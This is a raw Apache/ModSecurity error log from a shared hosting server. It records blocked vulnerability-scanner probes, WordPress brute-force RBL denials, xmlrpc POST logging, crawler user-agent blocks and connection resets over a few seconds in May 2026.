[Tue May 26 13:21:42.951460 2026] [security2:error] [pid 512344:tid 512475] [client 4.201.75.230:5693] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.ytejju8iu.com.md-74.webhostbox.net"] [uri "/function/function.php"] [unique_id "ahVRDsbElyei4S77DQfoVAAAAAE"]
[Tue May 26 13:21:43.203613 2026] [security2:error] [pid 512344:tid 512564] [client 5.183.252.237:9023] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "302"] [hostname "server.dezka.mx"] [uri "/xmlrpc.php"] [unique_id "ahVRD8bElyei4S77DQfoWAAAAFo"]
[Tue May 26 13:21:43.203659 2026] [security2:error] [pid 512344:tid 512564] [client 5.183.252.237:9023] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "server.dezka.mx"] [uri "/xmlrpc.php"] [unique_id "ahVRD8bElyei4S77DQfoWAAAAFo"]
[Tue May 26 13:21:43.346926 2026] [deflate:error] [pid 512344:tid 512561] (104)Connection reset by peer: [client 185.88.102.114:9567] AH10298: failed reading from PIPE bucket
[Tue May 26 13:21:44.139152 2026] [security2:error] [pid 512745:tid 512999] [client 185.88.102.114:25871] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "302"] [hostname "server.dezka.mx"] [uri "/news/xmlrpc.php"] [unique_id "ahVREHKSB_s2CvZg7xNNXwAAAYY"]
[Tue May 26 13:21:44.139200 2026] [security2:error] [pid 512745:tid 512999] [client 185.88.102.114:25871] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "server.dezka.mx"] [uri "/news/xmlrpc.php"] [unique_id "ahVREHKSB_s2CvZg7xNNXwAAAYY"]
[Tue May 26 13:21:44.400350 2026] [security2:error] [pid 512745:tid 512887] [client 4.201.75.230:5291] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.ytejju8iu.com.md-74.webhostbox.net"] [uri "/rip.php"] [unique_id "ahVREHKSB_s2CvZg7xNNZAAAARY"]
[Tue May 26 13:21:44.475369 2026] [security2:error] [pid 512745:tid 512991] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVREHKSB_s2CvZg7xNNXgAAAX4"]
[Tue May 26 13:21:44.648841 2026] [deflate:error] [pid 512344:tid 512521] (104)Connection reset by peer: [client 5.183.252.237:46531] AH10298: failed reading from PIPE bucket
[Tue May 26 13:21:44.944587 2026] [deflate:error] [pid 512745:tid 512879] (104)Connection reset by peer: [client 185.88.102.114:22547] AH10298: failed reading from PIPE bucket
[Tue May 26 13:21:45.568768 2026] [security2:error] [pid 512745:tid 512901] [client 4.201.75.230:5286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.ytejju8iu.com.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahVREXKSB_s2CvZg7xNNcwAAASQ"]
[Tue May 26 13:21:45.783111 2026] [security2:error] [pid 512745:tid 512995] [client 185.88.102.114:43853] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "302"] [hostname "server.dezka.mx"] [uri "/news/xmlrpc.php"] [unique_id "ahVREXKSB_s2CvZg7xNNfQAAAYI"]
[Tue May 26 13:21:45.783148 2026] [security2:error] [pid 512745:tid 512995] [client 185.88.102.114:43853] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "server.dezka.mx"] [uri "/news/xmlrpc.php"] [unique_id "ahVREXKSB_s2CvZg7xNNfQAAAYI"]
[Tue May 26 13:21:46.095516 2026] [security2:error] [pid 512344:tid 512543] [client 5.183.252.237:31553] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "302"] [hostname "server.dezka.mx"] [uri "/xmlrpc.php"] [unique_id "ahVREsbElyei4S77DQfocAAAAEU"]
[Tue May 26 13:21:46.095548 2026] [security2:error] [pid 512344:tid 512543] [client 5.183.252.237:31553] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "server.dezka.mx"] [uri "/xmlrpc.php"] [unique_id "ahVREsbElyei4S77DQfocAAAAEU"]
[Tue May 26 13:21:46.469485 2026] [security2:error] [pid 512745:tid 512942] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVREnKSB_s2CvZg7xNNhgAAAU0"]
[Tue May 26 13:21:46.554304 2026] [deflate:error] [pid 512745:tid 512969] (104)Connection reset by peer: [client 185.88.102.114:31595] AH10298: failed reading from PIPE bucket
[Tue May 26 13:21:47.085056 2026] [security2:error] [pid 512344:tid 512557] [client 193.202.83.42:44429] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "302"] [hostname "server.dezka.mx"] [uri "/xmlrpc.php"] [unique_id "ahVREsbElyei4S77DQfocwAAAFM"]
[Tue May 26 13:21:47.085092 2026] [security2:error] [pid 512344:tid 512557] [client 193.202.83.42:44429] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "server.dezka.mx"] [uri "/xmlrpc.php"] [unique_id "ahVREsbElyei4S77DQfocwAAAFM"]
[Tue May 26 13:21:47.297512 2026] [deflate:error] [pid 512745:tid 512981] (104)Connection reset by peer: [client 5.183.252.237:35045] AH10298: failed reading from PIPE bucket
[Tue May 26 13:21:47.568651 2026] [security2:error] [pid 512745:tid 512957] [client 213.232.123.19:56295] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.123.232.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "server.dezka.mx"] [uri "/wp-login.php"] [unique_id "ahVRE3KSB_s2CvZg7xNNoQAAAVw"]
[Tue May 26 13:21:47.587844 2026] [security2:error] [pid 512745:tid 512931] [client 4.201.75.230:5289] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.ytejju8iu.com.md-74.webhostbox.net"] [uri "/wp-content/uploads/index.php"] [unique_id "ahVRE3KSB_s2CvZg7xNNqAAAAUI"]
[Tue May 26 13:21:47.939736 2026] [deflate:error] [pid 512745:tid 512875] (104)Connection reset by peer: [client 193.202.83.42:35575] AH10298: failed reading from PIPE bucket
[Tue May 26 13:21:48.701688 2026] [security2:error] [pid 512745:tid 512919] [client 193.202.83.42:11089] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "302"] [hostname "server.dezka.mx"] [uri "/xmlrpc.php"] [unique_id "ahVRFHKSB_s2CvZg7xNNwgAAATY"]
[Tue May 26 13:21:48.701724 2026] [security2:error] [pid 512745:tid 512919] [client 193.202.83.42:11089] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "server.dezka.mx"] [uri "/xmlrpc.php"] [unique_id "ahVRFHKSB_s2CvZg7xNNwgAAATY"]
[Tue May 26 13:21:48.804180 2026] [security2:error] [pid 512745:tid 512909] [client 5.183.252.237:62779] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "302"] [hostname "server.dezka.mx"] [uri "/news/xmlrpc.php"] [unique_id "ahVRFHKSB_s2CvZg7xNNygAAASw"]
[Tue May 26 13:21:48.804211 2026] [security2:error] [pid 512745:tid 512909] [client 5.183.252.237:62779] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "server.dezka.mx"] [uri "/news/xmlrpc.php"] [unique_id "ahVRFHKSB_s2CvZg7xNNygAAASw"]
[Tue May 26 13:21:49.156279 2026] [security2:error] [pid 512745:tid 512921] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRFHKSB_s2CvZg7xNNxgAAATg"]
[Tue May 26 13:21:49.522997 2026] [deflate:error] [pid 512745:tid 512924] (104)Connection reset by peer: [client 193.202.83.42:27507] AH10298: failed reading from PIPE bucket
[Tue May 26 13:21:50.073447 2026] [security2:error] [pid 512344:tid 512523] [client 213.232.123.19:47515] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.123.232.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "server.dezka.mx"] [uri "/news/wp-login.php"] [unique_id "ahVRFsbElyei4S77DQfohgAAADE"]
[Tue May 26 13:21:50.151348 2026] [deflate:error] [pid 512344:tid 512570] (104)Connection reset by peer: [client 5.183.252.237:23615] AH10298: failed reading from PIPE bucket
[Tue May 26 13:21:50.273121 2026] [security2:error] [pid 512745:tid 512931] [client 74.7.228.63:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.proxuber.glorodavionics.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVRFnKSB_s2CvZg7xNN5gAAAUI"]
[Tue May 26 13:21:50.273656 2026] [security2:error] [pid 512745:tid 512951] [client 74.7.228.63:36230] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.proxuber.glorodavionics.com"] [uri "/robots.txt"] [unique_id "ahVRFnKSB_s2CvZg7xNN5AABVmk"]
[Tue May 26 13:21:50.331753 2026] [security2:error] [pid 512344:tid 512499] [client 193.202.83.42:61797] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "302"] [hostname "server.dezka.mx"] [uri "/xmlrpc.php"] [unique_id "ahVRFsbElyei4S77DQfoiAAAABk"]
[Tue May 26 13:21:50.331782 2026] [security2:error] [pid 512344:tid 512499] [client 193.202.83.42:61797] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "server.dezka.mx"] [uri "/xmlrpc.php"] [unique_id "ahVRFsbElyei4S77DQfoiAAAABk"]
[Tue May 26 13:21:50.652565 2026] [autoindex:error] [pid 512344:tid 512506] [client 74.7.241.30:0] AH01276: Cannot serve directory /home2/glorolle/public_html/proxuber.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:21:50.871138 2026] [security2:error] [pid 512344:tid 512432] [remote 47.128.46.88:27394] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cicodev.org"] [uri "/ressources/securite-alimentaire-foncier/709-aida-adopte-le-riz-local"] [unique_id "ahVRFsbElyei4S77DQfolgAAG1c"]
[Tue May 26 13:21:50.990300 2026] [security2:error] [pid 512344:tid 512431] [remote 95.216.117.13:49324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVRFsbElyei4S77DQfolQAAX1Y"]
[Tue May 26 13:21:51.189417 2026] [deflate:error] [pid 512745:tid 512890] (104)Connection reset by peer: [client 193.202.83.42:28409] AH10298: failed reading from PIPE bucket
[Tue May 26 13:21:51.488027 2026] [security2:error] [pid 512745:tid 512875] [client 5.183.252.237:26541] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "302"] [hostname "server.dezka.mx"] [uri "/news/xmlrpc.php"] [unique_id "ahVRF3KSB_s2CvZg7xNN-QAAAQo"]
[Tue May 26 13:21:51.488062 2026] [security2:error] [pid 512745:tid 512875] [client 5.183.252.237:26541] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "server.dezka.mx"] [uri "/news/xmlrpc.php"] [unique_id "ahVRF3KSB_s2CvZg7xNN-QAAAQo"]
[Tue May 26 13:21:51.682050 2026] [security2:error] [pid 512344:tid 512479] [client 89.221.206.84:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVRFsbElyei4S77DQfoigAAAAU"], referer: https://www.anujtradingco.com/
[Tue May 26 13:21:51.716893 2026] [security2:error] [pid 512344:tid 512507] [client 80.76.42.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVRF8bElyei4S77DQfomwAAACE"], referer: https://www.anujtradingco.com/
[Tue May 26 13:21:51.788029 2026] [security2:error] [pid 512745:tid 512982] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRF3KSB_s2CvZg7xNN-AAAAXU"]
[Tue May 26 13:21:52.023689 2026] [security2:error] [pid 512745:tid 512898] [client 193.202.83.42:13807] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "302"] [hostname "server.dezka.mx"] [uri "/news/xmlrpc.php"] [unique_id "ahVRGHKSB_s2CvZg7xNOBwAAASE"]
[Tue May 26 13:21:52.023725 2026] [security2:error] [pid 512745:tid 512898] [client 193.202.83.42:13807] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "server.dezka.mx"] [uri "/news/xmlrpc.php"] [unique_id "ahVRGHKSB_s2CvZg7xNOBwAAASE"]
[Tue May 26 13:21:52.746386 2026] [security2:error] [pid 512344:tid 512497] [client 89.221.206.84:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVRGMbElyei4S77DQfooQAAABc"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1135507&moderation-hash=a60093699166c1bb92a1b77248c9412a
[Tue May 26 13:21:52.797212 2026] [deflate:error] [pid 512344:tid 512584] (104)Connection reset by peer: [client 193.202.83.42:25363] AH10298: failed reading from PIPE bucket
[Tue May 26 13:21:52.872034 2026] [deflate:error] [pid 512745:tid 512948] (104)Connection reset by peer: [client 5.183.252.237:58597] AH10298: failed reading from PIPE bucket
[Tue May 26 13:21:53.593985 2026] [security2:error] [pid 512745:tid 512963] [client 193.202.83.42:48329] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "302"] [hostname "server.dezka.mx"] [uri "/news/xmlrpc.php"] [unique_id "ahVRGXKSB_s2CvZg7xNOHwAAAWI"]
[Tue May 26 13:21:53.594024 2026] [security2:error] [pid 512745:tid 512963] [client 193.202.83.42:48329] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "server.dezka.mx"] [uri "/news/xmlrpc.php"] [unique_id "ahVRGXKSB_s2CvZg7xNOHwAAAWI"]
[Tue May 26 13:21:53.668253 2026] [security2:error] [pid 512344:tid 512516] [client 4.201.75.230:5280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.ytejju8iu.com.md-74.webhostbox.net"] [uri "/cache.php"] [unique_id "ahVRGcbElyei4S77DQfotAAAACo"]
[Tue May 26 13:21:54.074290 2026] [security2:error] [pid 512344:tid 512478] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRGcbElyei4S77DQfoswAAAAQ"]
[Tue May 26 13:21:54.122930 2026] [security2:error] [pid 512745:tid 512983] [client 5.183.252.237:27877] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "302"] [hostname "server.dezka.mx"] [uri "/news/xmlrpc.php"] [unique_id "ahVRGnKSB_s2CvZg7xNOMgAAAXY"]
[Tue May 26 13:21:54.122974 2026] [security2:error] [pid 512745:tid 512983] [client 5.183.252.237:27877] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "server.dezka.mx"] [uri "/news/xmlrpc.php"] [unique_id "ahVRGnKSB_s2CvZg7xNOMgAAAXY"]
[Tue May 26 13:21:54.375815 2026] [deflate:error] [pid 512745:tid 512900] (104)Connection reset by peer: [client 193.202.83.42:46527] AH10298: failed reading from PIPE bucket
[Tue May 26 13:21:55.139135 2026] [security2:error] [pid 512745:tid 512994] [client 193.202.83.42:31467] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "302"] [hostname "server.dezka.mx"] [uri "/news/xmlrpc.php"] [unique_id "ahVRG3KSB_s2CvZg7xNOOwAAAYE"]
[Tue May 26 13:21:55.139192 2026] [security2:error] [pid 512745:tid 512994] [client 193.202.83.42:31467] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "server.dezka.mx"] [uri "/news/xmlrpc.php"] [unique_id "ahVRG3KSB_s2CvZg7xNOOwAAAYE"]
[Tue May 26 13:21:55.622505 2026] [deflate:error] [pid 512745:tid 513002] (104)Connection reset by peer: [client 5.183.252.237:62439] AH10298: failed reading from PIPE bucket
[Tue May 26 13:21:56.006962 2026] [deflate:error] [pid 512344:tid 512572] (104)Connection reset by peer: [client 193.202.83.42:33021] AH10298: failed reading from PIPE bucket
[Tue May 26 13:21:56.280511 2026] [security2:error] [pid 512745:tid 512978] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRG3KSB_s2CvZg7xNOSwAAAXE"]
[Tue May 26 13:21:56.928066 2026] [security2:error] [pid 512344:tid 512571] [client 4.201.75.230:5293] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.ytejju8iu.com.md-74.webhostbox.net"] [uri "/themes.php"] [unique_id "ahVRHMbElyei4S77DQfo3gAAAGE"]
[Tue May 26 13:21:57.126709 2026] [security2:error] [pid 512344:tid 512585] [client 80.76.42.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVRHcbElyei4S77DQfo4AAAAG8"], referer: https://anujtradingco.com
[Tue May 26 13:21:57.158507 2026] [security2:error] [pid 512745:tid 512890] [client 89.221.206.84:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVRHXKSB_s2CvZg7xNOagAAARk"], referer: https://anujtradingco.com
[Tue May 26 13:21:57.184975 2026] [security2:error] [pid 512745:tid 512929] [client 130.49.9.239:50853] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "server.dezka.mx"] [uri "/wp-login.php"] [unique_id "ahVRHHKSB_s2CvZg7xNOXAAAAUA"]
[Tue May 26 13:21:57.247816 2026] [security2:error] [pid 512745:tid 512893] [client 217.145.224.160:48351] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "server.dezka.mx"] [uri "/wp-login.php"] [unique_id "ahVRHHKSB_s2CvZg7xNOYQAAARw"]
[Tue May 26 13:21:57.537365 2026] [security2:error] [pid 512745:tid 512999] [client 212.119.47.254:53803] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "302"] [hostname "server.dezka.mx"] [uri "/xmlrpc.php"] [unique_id "ahVRHHKSB_s2CvZg7xNOZQAAAYY"]
[Tue May 26 13:21:57.537411 2026] [security2:error] [pid 512745:tid 512999] [client 212.119.47.254:53803] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "server.dezka.mx"] [uri "/xmlrpc.php"] [unique_id "ahVRHHKSB_s2CvZg7xNOZQAAAYY"]
[Tue May 26 13:21:58.311236 2026] [deflate:error] [pid 512745:tid 512947] (104)Connection reset by peer: [client 212.119.47.254:36785] AH10298: failed reading from PIPE bucket
[Tue May 26 13:21:58.694553 2026] [security2:error] [pid 512745:tid 512949] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRHnKSB_s2CvZg7xNOjAAAAVQ"]
[Tue May 26 13:21:58.963482 2026] [security2:error] [pid 512745:tid 512974] [client 4.204.220.190:8793] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.webbieleon.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVRHnKSB_s2CvZg7xNOnQAAAW0"]
[Tue May 26 13:21:58.963620 2026] [security2:error] [pid 512745:tid 512974] [client 4.204.220.190:8793] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.webbieleon.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVRHnKSB_s2CvZg7xNOnQAAAW0"]
[Tue May 26 13:21:59.050179 2026] [security2:error] [pid 512344:tid 512508] [client 212.119.47.254:61777] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "302"] [hostname "server.dezka.mx"] [uri "/xmlrpc.php"] [unique_id "ahVRH8bElyei4S77DQfo-AAAACI"]
[Tue May 26 13:21:59.050214 2026] [security2:error] [pid 512344:tid 512508] [client 212.119.47.254:61777] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "server.dezka.mx"] [uri "/xmlrpc.php"] [unique_id "ahVRH8bElyei4S77DQfo-AAAACI"]
[Tue May 26 13:21:59.109872 2026] [security2:error] [pid 512344:tid 512589] [client 4.204.220.190:8788] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.webbieleon.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahVRH8bElyei4S77DQfo-wAAAHM"]
[Tue May 26 13:21:59.109979 2026] [security2:error] [pid 512344:tid 512589] [client 4.204.220.190:8788] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.webbieleon.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahVRH8bElyei4S77DQfo-wAAAHM"]
